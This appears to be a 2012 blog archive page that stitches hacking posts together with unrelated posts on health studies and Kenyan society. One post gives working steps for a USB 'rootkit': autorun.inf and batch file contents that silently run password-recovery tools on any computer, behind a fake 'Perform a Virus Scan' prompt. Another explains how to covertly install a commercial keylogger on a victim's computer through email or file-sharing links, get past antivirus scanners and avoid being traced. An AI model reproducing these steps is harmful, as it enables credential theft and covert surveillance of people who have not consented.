Archive for June, 2012
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
Continue Reading http://shehab3451-hacking.tumblr.com/post/26207677401/sniffing-passwords-using-a-usb-drive#ixzz1zHj2Jdkf
Under Creative Commons License: Attribution
Follow us: @HackerArticles on Twitter | thehackercommunity on Facebook
Vitamin D With Calcium Decreases Mortality Risk in Older People
According to the current study by Rejnmark and colleagues, maintenance of adequate vitamin D status may be necessary for many physiologic functions, beyond that of the classic actions of vitamin D on bone and mineral metabolism. Cross-sectional and longitudinal studies have linked reduced vitamin D status with a number of cancers, adverse cardiovascular and immunologic outcomes, and increased all-cause mortality rates, although some observational data have suggested either U-shaped or reverse J-shaped relationships. Meta-analyses have shown contradicting results for the role of calcium and vitamin D supplements on mortality.
This systematic review identifies individual patient data and trial-level meta-analyses to assess mortality risk among participants randomly assigned to either supplementation with vitamin D alone or vitamin D with calcium.
STUDY SYNOPSIS AND PERSPECTIVE
Increasing intake of vitamin D and calcium reduces fracture risk in older patients and may…
View original post 1,582 more words
According to a research…Your heartbeat changes with the music you listen to!
Music can be so powerful it can affect your mood, brainwaves, and even your heartbeat! It turns out that when we listen to music our body reacts to the sounds we hear.
If a person listens to rock or techno, their heartbeat will involuntarily speed up. The opposite is true if someone listens to more calming or instrumental music.
Music is so influential it can alter your heartbeat, pulse rate, blood pressure, decrease your muscle tension, and even affect your body movement and coordination!..!
Have u ever experienced any effect…??
chewing gum vs knowledge ???
Students who chewed gum for five minutes before taking a test got better marks than those who didn’t chew gum.
Previous research has shown that any type of physical activity improves brain performance, but this study shows that even minor physical activity can do so.
The benefits of chewing gum occurred only when it was done for five minutes before a test, not if it was done during the entire test. This may be because chewing and thinking conflict with each other, Onyper suggested in a university news release
Lets first understand keyloggers and keylogging: Keystroke logging (often called keylogging) is the practice of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software. here i am discussing only software keyloggers.
What is a Keylogger?
The keylogger program records each keystroke the user types and uploads the information over the Internet periodically to whoever installed the program.
A keylogger program does not require physical access to the user’s computer. It can be downloaded on purpose by someone who wants to monitor activity on a particular computer or it can be downloaded unwittingly as spyware and executed as part of a rootkit or remote administration (RAT) Trojan horse. A keylogger program typically consists of two files that get installed in the same directory: a dynamic link library (DLL) file (which does all the recording) and an executable file (.EXE) that installs the DLL file and triggers it to work.
In simple words KeyLogger Software allows you to find out what other users do on your computer in your absence. Key logger invisibly records keystrokes of every user activity performed on the computer in encrypted log files with option to send the details at specified email id.
How Keylogger works?
Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://mail.yahoo.com/ and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.
How to install the keylogger?
A keylogger can be installed just like any other program. Just follow the instructions and you’re done.
After installation of the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his computer. This is because, once installed the keylogger will run in total stealth mode. Totally invisible to anti-viruses and anti-spyware, Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his PC.
Can I be traced back if I install the keylogger on some other computer?
No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.
The Best keylogger:-
Today there exists hundreds of keyloggers in the market and most of them are no more than a scam. so here i am discussing a software that is genuine and tested by some great geeks and also it is recognized by BBC, CNN, CBS..etc.
Best Keylogger: SniperSpy (tested)
How SniperSpy works?
After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.
When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.
You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.
I don’t have physical access to the traget computer. Can I still install keylogger?
Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).
Can I install Keylogger on a local computer?
If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module. Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.
What if the antivirus block from sending it as an email attachment?
some antiviruses (attachment scanners) may block it, for this do on thing Instead of sending the keylogger as an email attachment, you just place the file in .ZIP/.RAR format and upload it to some file sharing site like http://box.net/ , http://fileden.com/ , http://rapidshare.com/ ..etc. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.
Some Facts About SniperSpy – why it is the best?
SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista and bypasses ANY Firewall.
SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.
SniperSpy captures full-size screenshots of the activities on the target PC.
Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
SniperSpy is more easy to install and requires no extra knowledge.
SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it is reputed and trustworthy.
Some keyloggers capture screens, rather than keystrokes.
Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.
There is a curious sense of regretful achievement in Kenya. It permeates all the entire fabric of society like mist at dawn. It is visible on the faces of Nairobians, it is laden in the voices/tones of the peoples of Rift Valley and at the Coast they talk of the good old days in vinegary tones. It is not that the past was that glorious. They talk of the seventies, when the Kenya Bus Services was efficient. The era of abbreviations – K.F.A., K.G.G.C.U., A.F.C., K.P.C.U. – before we went gaga with one-word brand names like Safaricom and Nakumatt. They talk about someone who has faded from memory and say, ‘Oh, that one who made money running down K.M.C.’ and nod approvingly after remembering him. The man who ran the best scam in our country is the current chair of a self-appointed council of elders. I am told his autobiography…
View original post 1,084 more words